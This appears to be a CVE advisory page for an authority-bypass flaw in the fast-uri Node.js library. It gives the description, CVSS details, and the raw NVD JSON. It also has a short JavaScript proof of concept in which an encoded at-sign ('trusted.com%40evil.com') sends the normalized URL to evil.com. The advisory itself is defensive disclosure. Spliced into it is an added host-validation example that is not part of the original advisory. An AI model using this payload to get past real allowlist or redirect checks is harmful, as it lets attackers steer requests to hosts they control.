Security Vulnerability Report
CVE-2026-6322 CVSS 7.5 HIGH

CVE-2026-6322

Published: 2026-05-05 11:16:33
Last Modified: 2026-05-12 19:11:32
Source: ce714d77-add3-4f53-aff5-83d477b104bb

Description

fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions <= 3.1.1 are affected. Update to 3.1.2 or later.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openjsf:fast-uri:*:*:*:*:*:node.js:*:* - VULNERABLE
fast-uri <= 3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-6322
// Demonstrating the host authority bypass
const { parse, serialize } = require('fast-uri');

// Malicious URI containing an encoded @ (%40) in the host part
// Attacker intends to route requests to evil.com
const maliciousUri = 'http://trusted.com%40evil.com/path';
console.log('Original URI:', maliciousUri);

// Parse the URI
const parsed = parse(maliciousUri);
console.log('Parsed Host component:', parsed.host);

// Normalize/Serialize the URI (vulnerable behavior)
const normalizedUri = serialize(parsed);
console.log('Normalized URI:', normalizedUri);

// Verify the authority change
const reParsed = parse(normalizedUri);
console.log('Final Host after Normalization:', reParsed.host);
console.log('Final Userinfo:', reParsed.userinfo);

// Expected output in vulnerable versions:
// Normalized URI: http://trusted.com@evil.com/path
// Final Host: evil.com
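As an added, dependency-free example (not fast-uri's code and not part of the advisory): a host check that refuses a URL when normalization changes its host, or when the host carries percent-encoded authority delimiters, which is the condition the description above warns about. `validateHost`, its helpers and the allowlist are hypothetical names; `normalizedUri` stands for whatever the URI library's normalize()/serialize() returned for `rawUri`.

```javascript
// Hypothetical defensive check for the CVE-2026-6322 pattern (added example).
// Percent-encoded forms of the authority delimiters @ : / ? # [ ]. A real
// registered-name host never contains these, so their presence in the host
// means a delimiter is being smuggled past the parser.
const ENCODED_AUTHORITY_DELIMS = /%(40|3a|2f|3f|23|5b|5d)/i;

// Authority = text between "scheme://" and the next / ? #, taken verbatim
// (no decoding), so what we inspect is what the library was handed.
function rawAuthority(uri) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^/?#]*)/i.exec(uri);
  return m ? m[1] : null;
}

// Host of an authority: drop userinfo (up to the last raw "@") and the port.
// IPv6 literals keep their brackets so ":" inside them is not read as a port.
function hostOfAuthority(authority) {
  const afterUserinfo = authority.slice(authority.lastIndexOf('@') + 1);
  if (afterUserinfo.startsWith('[')) {
    return afterUserinfo.slice(0, afterUserinfo.indexOf(']') + 1).toLowerCase();
  }
  return afterUserinfo.replace(/:\d*$/, '').toLowerCase();
}

// Compare the host seen in the raw input with the host seen after the URI
// library normalized it. If they differ, normalization moved the authority
// (the CVE-2026-6322 effect) and the URL must not be used for routing or
// redirects. Returns { ok, host } or { ok: false, reason }.
function validateHost(rawUri, normalizedUri, allowlist) {
  const rawAuth = rawAuthority(rawUri);
  const normAuth = rawAuthority(normalizedUri);
  if (rawAuth === null || normAuth === null) {
    return { ok: false, reason: 'no authority' };
  }
  const rawHost = hostOfAuthority(rawAuth);
  const normHost = hostOfAuthority(normAuth);
  if (rawHost !== normHost) {
    return { ok: false, reason: `authority changed by normalization: ${rawHost} -> ${normHost}` };
  }
  // Even when the library preserves the encoding (fixed versions), a host with
  // an encoded delimiter is not a host any allowlist entry should match.
  if (ENCODED_AUTHORITY_DELIMS.test(rawHost)) {
    return { ok: false, reason: `encoded delimiter in host: ${rawHost}` };
  }
  if (!allowlist.includes(normHost)) {
    return { ok: false, reason: `host not allowlisted: ${normHost}` };
  }
  return { ok: true, host: normHost };
}
```

Run the check on both the raw input and the normalized output and route only when `ok` is true; the `reason` string is what you would want in the application log when a request is refused.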

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6322", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-05-05T11:16:33.360", "lastModified": "2026-05-12T19:11:31.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions <= 3.1.1 are affected. Update to 3.1.2 or later."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-436"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openjsf:fast-uri:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.1.2", "matchCriteriaId": "0A43D369-152F-4AA7-B998-6CB40A81D94D"}]}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}, {"url": 
"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}]}}